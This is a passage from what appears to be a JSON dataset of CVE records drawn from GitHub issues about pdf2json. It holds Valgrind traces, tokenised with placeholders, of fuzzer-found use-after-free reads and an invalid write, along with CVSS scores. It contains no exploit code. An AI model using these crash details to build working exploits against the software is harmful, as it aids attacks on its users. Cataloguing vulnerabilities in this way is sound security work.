NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG C8: memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afac is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E9: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A NUMBERTAG strcmp_sse2_unaligned (strcmp sse2 APITAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG BD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG pure virtual method called terminate called without an active exception NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGABRT NUMBERTAG at NUMBERTAG raise APITAG NUMBERTAG by NUMBERTAG abort APITAG NUMBERTAG by NUMBERTAG EC NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG B5: ??? (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG E: __cxa_pure_virtual (in PATHTAG NUMBERTAG by NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG of which reachable via heuristic NUMBERTAG newarray NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Aborted ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19475",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/36",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/36",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-29T17:55:30Z",
        "description": "SEGV on APITAG Hi, Our fuzzer found a crash due to an invalid write on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, 